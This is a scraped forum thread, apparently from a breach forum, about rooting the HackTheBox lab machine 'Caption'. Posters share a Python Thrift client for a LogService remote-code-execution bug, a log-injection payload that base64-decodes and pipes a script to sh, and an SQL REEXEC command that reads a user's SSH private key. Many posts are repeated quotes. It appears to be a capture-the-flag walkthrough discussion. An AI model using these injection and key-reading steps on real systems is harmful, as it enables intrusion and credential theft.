[spamdegratis5]

The way to root is using thrift client and leverage the LogService rce
Steps:
- clone the repo in the margo home, generate the python files (easiest way) https://thrift.apache.org/tutorial/py.html

thrift --gen py log_service.thrift

- scp the generated file to your attacker machine, install the python library thrift (on your machine - virtual environment)
- create a file in the box using this format: {"user-agent":"your_payload'", "ip":"1.1.1.1"}
- local forward the 9090 port to your machine
- create a client in python and execute it

from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService

def main():
    transport = TSocket.TSocket('127.0.0.1', 9090)
    transport = TTransport.TBufferedTransport(transport)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = LogService.Client(protocol)
    transport.open()
    try:
        response = client.ReadLogFile("/path/to/file/created")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        transport.close()

if __name__ == "__main__":
    main()

[HooptieDooptie]

for the slow guy can someone help with the command that cats the ssh key

CALL REEXEC('cat .ssh/id_ecdsa');

[hollb_geek]

for the slow guy can someone help with the command that cats the ssh key

CALL REEXEC('cat .ssh/id_ecdsa');

I'd start mentioning the alias REEXEC creation as shown in medium

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[HooptieDooptie]

for the slow guy can someone help with the command that cats the ssh key

CALL REEXEC('cat .ssh/id_ecdsa');

I'd start mentioning the alias REEXEC creation as shown in medium

Well no offence, but he didn’t ask for that. I should’ve just said cat .ssh/id_edcdsa, since he obviously knew he could enumerate the file system using the RCE mentioned in the medium post, which was mentioned before

[v3701]

The way to root is using thrift client and leverage the LogService rce
Steps:
- clone the repo in the margo home, generate the python files (easiest way) https://thrift.apache.org/tutorial/py.html

thrift --gen py log_service.thrift

- scp the generated file to your attacker machine, install the python library thrift (on your machine - virtual environment)
- create a file in the box using this format: {"user-agent":"your_payload'", "ip":"1.1.1.1"}
- local forward the 9090 port to your machine
- create a client in python and execute it

from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService

def main():
    transport = TSocket.TSocket('127.0.0.1', 9090)
    transport = TTransport.TBufferedTransport(transport)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = LogService.Client(protocol)
    transport.open()
    try:
        response = client.ReadLogFile("/path/to/file/created")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        transport.close()

if __name__ == "__main__":
    main()

For root part, the payload content :

```
4.3.2.1 "user-agent":"'; echo PATLOAD_B64 | base64 -d | sh ; #"
```

[hackemall]

for the slow guy can someone help with the command that cats the ssh key

CALL REEXEC('cat .ssh/id_ecdsa');

I'd start mentioning the alias REEXEC creation as shown in medium

Well no offence, but he didn’t ask for that. I should’ve just said cat .ssh/id_edcdsa, since he obviously knew he could enumerate the file system using the RCE mentioned in the medium post, which was mentioned before

thank you i got

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[maggi]

I did not get the medium thing working but I got this to work if it helps anyone

https://spaceraccoon.dev/remote-code-exe...-database/

[gubxo]

https://www.hackthebox.com/machines/caption
https://app.hackthebox.com/machines/625

Have fun and good luck everyone!

https://pbs.twimg.com/media/GXR-8C8WcAIbnPF?format=jpg

owww yeahhh babyyy TY 

[url=https://breachforums.bf/private.php?action=send&uid=307033][/url]

[0xwww]

The way to root is using thrift client and leverage the LogService rce
Steps:
- clone the repo in the margo home, generate the python files (easiest way) https://thrift.apache.org/tutorial/py.html

thrift --gen py log_service.thrift

- scp the generated file to your attacker machine, install the python library thrift (on your machine - virtual environment)
- create a file in the box using this format: {"user-agent":"your_payload'", "ip":"1.1.1.1"}
- local forward the 9090 port to your machine
- create a client in python and execute it

from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService

def main():
    transport = TSocket.TSocket('127.0.0.1', 9090)
    transport = TTransport.TBufferedTransport(transport)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = LogService.Client(protocol)
    transport.open()
    try:
        response = client.ReadLogFile("/path/to/file/created")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        transport.close()

if __name__ == "__main__":
    main()

I couldn't understand the first step, could you explain better?

I couldn't understand the first step, could you explain better?

[KSH]

The way to root is using thrift client and leverage the LogService rce
Steps:
- clone the repo in the margo home, generate the python files (easiest way) https://thrift.apache.org/tutorial/py.html

thrift --gen py log_service.thrift

- scp the generated file to your attacker machine, install the python library thrift (on your machine - virtual environment)
- create a file in the box using this format: {"user-agent":"your_payload'", "ip":"1.1.1.1"}
- local forward the 9090 port to your machine
- create a client in python and execute it

from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService

def main():
    transport = TSocket.TSocket('127.0.0.1', 9090)
    transport = TTransport.TBufferedTransport(transport)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = LogService.Client(protocol)
    transport.open()
    try:
        response = client.ReadLogFile("/path/to/file/created")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        transport.close()

if __name__ == "__main__":
    main()

I couldn't understand the first step, could you explain better?

I couldn't understand the first step, could you explain better?

Probably there's another path to root, I also did not really understand the thrift procedure, tried to replicate i but didn't manage to get it. There's also an user ruth in the machine which has to be there for something and probably thought to escalate privileges other way. There are credentials for web service on port 80 in app.py for margo and admin, but they seem to be not helpfull at all, tried to reuse the admin creds on ruth but sadly didn't work. Also tried to exploit the copyparty service but it does not seem to be possible, I guess we'll have to keep trying.